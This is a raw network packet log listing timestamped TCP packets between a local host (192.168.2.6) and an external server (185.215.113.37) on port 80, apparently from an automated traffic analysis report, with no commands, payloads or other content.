Oct 24, 2024 13:02:17.669786930 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.669836044 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.670449972 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.670471907 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.670491934 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.670504093 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.670516968 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.670543909 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.734882116 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.734946012 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.735008955 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.735033035 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.735172987 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.735634089 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.735655069 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.735678911 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.735687971 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.735697985 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.735727072 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.736443996 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.736459017 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.736486912 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.736502886 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.736530066 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.737479925 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.737503052 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.737518072 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.737530947 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.737548113 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.737560987 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.737591982 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.737606049 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.738516092 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.738537073 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.738560915 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.738568068 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.738576889 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.738595963 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.738605022 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.738663912 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.739430904 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.739447117 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.739473104 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.739492893 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.739535093 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.740343094 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.740365982 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.740385056 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.740406036 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.740422010 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.740453959 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.741400957 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.741420984 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.741444111 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.741456032 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.741486073 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.742420912 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.742443085 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.742461920 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.742476940 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.742492914 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.742500067 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.742530107 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.743094921 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.743115902 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.743139029 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.743158102 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.743184090 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.743206978 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.743916035 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.743937969 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.743958950 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.743980885 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.744003057 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.744677067 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.744699955 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.744721889 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.744729042 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.744739056 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.744766951 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.745486021 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.745507956 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.745526075 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.745537043 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.745548010 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.745565891 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.745578051 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.745604992 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.746287107 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.746309996 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.746326923 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.746335983 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.746351957 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.746367931 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.746375084 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.747001886 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.747045994 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.747066021 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.747087955 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.747111082 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.747129917 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.747852087 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.747874022 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.747894049 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.747903109 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.747911930 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.747929096 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.748634100 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.748653889 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.748677969 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.748687983 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.748696089 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.748709917 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.748719931 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.748878002 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.749439001 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.749459982 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.749481916 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.749494076 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.749531031 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.750181913 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.750201941 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.750225067 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.750232935 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.750252962 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.750263929 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.750279903 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.750305891 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.750942945 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.750965118 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.750991106 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.750998020 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.751007080 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.751029968 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.751718044 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.751744986 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.751769066 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.751777887 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.751789093 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.751805067 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.752460957 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.752482891 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.752501965 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.752511024 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.752526999 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.752542019 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.752548933 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.752568960 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.752605915 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.753439903 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.753462076 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.753479004 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.753494978 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.753509998 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.753520012 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.753539085 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.753554106 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.753578901 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.754405975 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.754427910 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.754451990 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.754457951 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.754467010 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.754481077 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.754489899 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.754631996 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.755305052 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.755333900 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.755353928 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.755373955 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.755384922 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.755402088 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.755414009 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.755439043 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.756179094 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.756239891 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.853760958 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.853868961 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.853894949 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.853970051 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.854074955 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.854094982 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.854139090 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.854501009 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.854518890 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.854542971 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.854557991 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.854564905 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.854608059 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.855408907 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.855428934 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.855449915 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.855469942 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.855490923 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.855496883 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.855509043 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.855535984 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.856306076 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.856324911 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.856344938 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.856364965 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.856379986 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.856405973 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.856414080 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.856414080 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.856424093 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.856529951 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.857170105 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.857189894 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.857211113 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.857222080 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.857233047 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.857245922 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.857255936 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.857486010 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.858087063 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.858108044 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.858124971 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.858139038 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.858148098 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.858165026 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.858175039 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.858191013 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.858226061 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.858994007 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.859014034 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.859033108 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.859052896 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.859072924 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.859080076 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.859088898 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.859128952 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.859857082 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.859875917 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.859898090 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:17.859919071 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:17.859941959 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.002161026 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.007992983 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.286243916 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.286324024 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.286341906 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.286360025 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.286403894 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.286624908 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.286647081 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.286668062 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.286690950 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.286698103 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.286708117 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.286736965 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.287414074 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.287431955 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.287453890 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.287472963 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.287504911 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.287530899 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.288234949 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.288283110 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.288305044 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.288324118 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.288345098 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.288361073 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.288372993 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.288388968 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.288414001 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.289187908 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.289206982 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.289232969 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.289239883 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.289248943 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.289263010 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.289272070 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.289289951 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.289325953 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.290077925 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.290097952 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.290118933 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.290141106 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.290149927 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.290163994 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.290175915 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.290193081 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.290215969 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.290985107 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.291006088 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.291024923 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.291045904 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.291063070 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.291070938 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.291090965 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.291112900 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.291848898 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.291870117 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.291887999 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.291910887 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.291925907 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.291934013 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.291949987 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.291980028 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.292699099 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.292728901 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.292740107 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.292757988 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.292778015 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.292794943 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.292824030 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.293643951 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.293664932 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.293684959 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.293704987 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.293723106 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.293731928 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.293750048 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.293757915 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.293773890 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.293802977 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.294372082 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.294390917 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.294413090 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.294433117 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.294450998 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.294460058 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.294477940 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.294506073 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.295200109 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.295219898 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.296180010 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.405324936 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.405364037 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.405386925 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.405400038 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.405416012 CEST	49711	80	192.168.2.6	185.215.113.37
